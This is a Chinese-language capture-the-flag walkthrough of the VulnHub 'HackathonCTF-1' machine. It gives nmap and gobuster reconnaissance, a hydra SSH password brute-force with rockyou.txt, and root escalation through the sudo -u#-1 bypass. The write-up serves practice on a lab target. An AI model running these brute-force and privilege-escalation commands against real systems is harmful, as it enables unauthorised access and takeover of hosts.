靶场:http://www.vulnhub.com/entry/hackathonctf-1,591/
-
查看对方的主机mac地址
-
我们用我们的kali进行存活主机扫描
命令:nmap -sS -sC -sV -p1-10000 192.168.25.0/24
搜索到对方主机的ip地址为 192.168.25.84
3. 扫描对方所开放的端口及一些其他信息,并保存/tmp/下,文件名为nmap.txt
命令:nmap -A 192.168.25.84 -o /tmp/nmap.txt
4. 对方竟然开启了80端口,我们可以去访问下
访问发现不存在,发现了,使用的是apache服务器,版本2.4.7,apache在2.4.0到2.4.29之间的版本,存在apache解析漏洞,所以这里存在解析漏洞
但是我们用nmap扫出存在robots.txt文件
http://192.168.25.84/robots.txt
下面有个base64加密的东西,解密看看是啥子,用burpsuite的decoder模块
ssh-bruteforce-sudoit ,
这是个提示:什么意思呢?通过ssh,进行暴力**,利用sudo进行提权得到它(root)
还有就是robots.txt中的那些ctf、sudo、ftc这三个有可能是目录,也有可能是文件
5. 别的不说,拿出我常用的神器gobuster,-x 是指定后缀名
命令:gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -x html -u http://192.168.25.84/
扫出来俩个,访问看看有啥
5.1 Ctf.html
查看源代码和页面都什么也没有
5.2 ftc.html
我猜测是不是ascii码(我很菜,别喷),结果解码啥也不是
5.3 sudo.html
有个username:test
有了账号,我们去尝试暴力**ssh
Ok
6. Hydra工具走起
命令:hydra -l test -P /usr/share/wordlists/rockyou.txt ssh://192.168.25.84:7223 -f
密码扫出来了
连接ssh:
命令:ssh [email protected] -p 7223
查看历史命令
命令:History
里面这个命令有点不同还有就是sudo -u#-1 /whoami
我们尝试输入以下
突然是root权限了,ok
我们进入root环境
总结:
1、robots.txt文件下的显示的如果没有后缀名字,光有名字,那么可能是目录,也可能是文件,可以通过gobuster进行扫描指定后缀名的文件
2、 提权方法,可以使用sudo -u#-1 /binbash
sudo -u username#uid
不加此参数,代表要以 root 的身份执行指令,而加了此参数,可以以 username 的身份执行指令(#uid 为该 username 的使用者号码)